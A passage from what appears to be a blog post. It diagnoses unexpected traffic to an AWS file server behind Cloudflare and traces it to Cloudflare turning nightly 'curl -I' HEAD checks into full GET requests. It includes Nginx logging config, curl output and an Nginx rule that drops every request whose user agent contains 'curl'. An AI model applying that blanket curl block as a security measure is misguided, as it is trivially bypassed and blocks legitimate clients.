    4. Option 4 – “there is a mistake on our end”. As there basically is nothing on our end and this nothing has not changed in years, the possibility for this to be the case is minimal. 

    On a support call we set a plan with the support agents to investigate it. I will change the public IP of the AWS machine and will reconfigure it on Cloudflare. In this way we hope to stop some of the requests. We have no plan for what to do after that.

    Can I block it on the Nginx level?

    Nginx is an HTTP server, serving files. There are a couple of options to explore there, but the most reasonable was to stop all curl requests to the Nginx server. This was the shortest path. There was no need to protect against other attacks, there was only the need to protect against the Cloudflare attack. The Cloudflare attack was using “curl” as a tool, so I decided to stop ‘curl’:

      # Surely not the best, but the simplest and will get the job done for now.
      if ($http_user_agent ~ 'curl') {
          return 444; # Consider returning 444. It's a special nginx code that drops the connection without responding.
      }

    Resolution

    I am now waiting to see if the change of the public IP of the AWS machine will have any impact and if not I am just rejecting all “curl” requests that seem to be what Cloudflare is using.

    Update 1

    The first solution that we decided to implement was to:

    Change the public IP of the AWS machine and change it in the DNS settings at Cloudflare. In this way we would make sure that only Cloudflare really knows this IP.

    Resolution is – It did not work!

    I knew it wouldn’t, because it was another way for support to get me to do something without really looking into the issue, but I went along with it. Better to exhaust this option and be sure.

    The traffic of a Cloudflare attacked machine. Changing the IP address on 3 September had no effect.

    Update 2

    Adding the CF-Connecting-IP header

    Cloudflare support was really helpful. They asked me to include CF-Connecting-IP in the logs. In this way we would know what the real IP making the requests is, and whether these are in fact Cloudflare machines.

    The header is described at https://support.cloudflare.com/hc/en-us/articles/200170986-How-does-Cloudflare-handle-HTTP-Request-headers-

    I went on and updated the Nginx configuration

    log_format  cloudflare_debug     '$remote_addr - $remote_user [$time_local] "$request" '
                          '$status $body_bytes_sent "$http_referer" '
                          '"$http_user_agent" "$http_x_forwarded_for" "$http_cf_connecting_ip"';
    
    access_log /var/log/nginx/access.log cloudflare_debug;
    

    Now the log file contained the original IP.

    Cloudflare makes a GET request when the client makes a HEAD request

    This is what I found out. The platform has a daily job that checks the machine and makes sure the files are ok. This integrity check was left there from times when we had to do it, years ago. It is still running and starts every night, checking the machine with HEAD requests. But Cloudflare started making GET requests on 28 August 2021 and this increases the traffic to the machine.
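
    For context, the integrity check is essentially a loop of HEAD requests. A Ruby equivalent of what it does would look roughly like this – the real job uses ‘curl -I’ and the list of urls here is an assumption:

    require "net/http"

    # Hypothetical list of file urls to verify
    file_urls = ["https://domain.com/file1.webm"]

    file_urls.each do |url|
      uri = URI(url)
      response = Net::HTTP.start(uri.host, uri.port, use_ssl: uri.scheme == "https") do |http|
        http.head(uri.request_uri) # HEAD only fetches the headers, so it should not generate traffic
      end
      warn "Integrity check failed for #{url}: #{response.code}" unless response.code == "200"
    end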

    Steps to reproduce

    Here are the steps to reproduce:

    1. I am sending a HEAD request with ‘curl -I’

    2. Cloudflare has not cached the file so there is “cf-cache-status: MISS”

    3. Cloudflare sends a GET request and gets the whole file

    4. Cloudflare responds to the HEAD request.

    5. I send a HEAD request again with ‘curl -I’

    6. Cloudflare has the file cached and there is a “cf-cache-status: HIT”

    7. The account server is not hit.

    The problem here is that I am sending a HEAD request to my file and Cloudflare is sending a GET request for the whole file in order to cache this file

    Commands to reproduce

    This is a HEAD request:

    $ curl -I https://domain.com/file1.webm
    HTTP/2 200
    date: Sat, 04 Sep 2021 07:09:11 GMT
    content-type: video/webm
    content-length: 2256504
    last-modified: Sat, 04 Jan 2014 14:24:01 GMT
    etag: "52c81981-226e78"
    cache-control: max-age=14400
    cf-cache-status: MISS
    accept-ranges: bytes
    expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Xg9TLgssa5Gm6j1fRlJZH8VahaoY21LdCE1W1JqVueu49mzdiTmh9MZp4pFZDsVeSmRg%2Bc%2FMryoN7tgmKUmdxhWzE7UZdVvgG%2FRxHSZ%2FYS6pDtxLwpXSD71jo5ADNyT4TSpKXtE%3D"}],"group":"cf-nel","max_age":604800}
    nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    server: cloudflare
    cf-ray: 689564111e594ee0-FRA
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

    This is the log right after the HEAD request. Note that I am sending a HEAD request to domain.com and Cloudflare is sending a GET request for the file.

    162.158.94.236 - - [04/Sep/2021:07:09:12 +0000] "GET /file1.webm HTTP/1.1" 200 2256504 "-" "curl/7.68.0" "188.254.161.195" "188.254.161.195"

    Then I send a second HEAD request:

    $ curl -I https://domain.com/file1.webm
    HTTP/2 200
    date: Sat, 04 Sep 2021 07:09:53 GMT
    content-type: video/webm
    content-length: 2256504
    last-modified: Sat, 04 Jan 2014 14:24:01 GMT
    etag: "52c81981-226e78"
    cache-control: max-age=14400
    cf-cache-status: HIT
    age: 42
    accept-ranges: bytes
    expect-ct: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
    report-to: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=CKSvpGGHoj5LfV6xXpPUK5kHJtdsX3fylgt%2F2%2B6G94oUsdAd8FnHmUgEUIgnj5dd2Vvsv%2BKQxxgsHdHA0RvpjTxATakFKFuirMeI%2FS3lAdDX5VA0tY74z0CRYEHM2rS%2Fld6K738%3D"}],"group":"cf-nel","max_age":604800}
    nel: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    server: cloudflare
    cf-ray: 689565175dffc29f-FRA
    alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400

    And then there is NOTHING in the log file

    Note that for the last HEAD request there is a “cf-cache-status: HIT”.

    Status and how it could be resolved?

    Yes, we are doing HEAD requests every day to the files in order to check that they are all working. Every day we send a HEAD request for every file to make sure all files are up to date. This has been going on for years and is a leftover of an integrity check we implemented in 2015.

    What changed on 28 August 2021 is that when Cloudflare receives a HEAD request for a file, it sends a GET request to our machine in order to cache the file. This is what changed and this is what is generating all the traffic.

    We send HEAD requests with ‘curl -I’.

    I have 30 weeks of log files that show that Cloudflare was sending HEAD requests like

    I have asked Cloudflare:

    Could you please roll back this change in the infrastructure and not send a GET request to our machine when you receive a HEAD request from a client?

    Let’s see how this will be resolved.

    Up to date conclusion

    Check your machines from time to time. I hope you don’t get in this situation.

    Want to keep in touch? – find me on LinkedIn or Twitter

     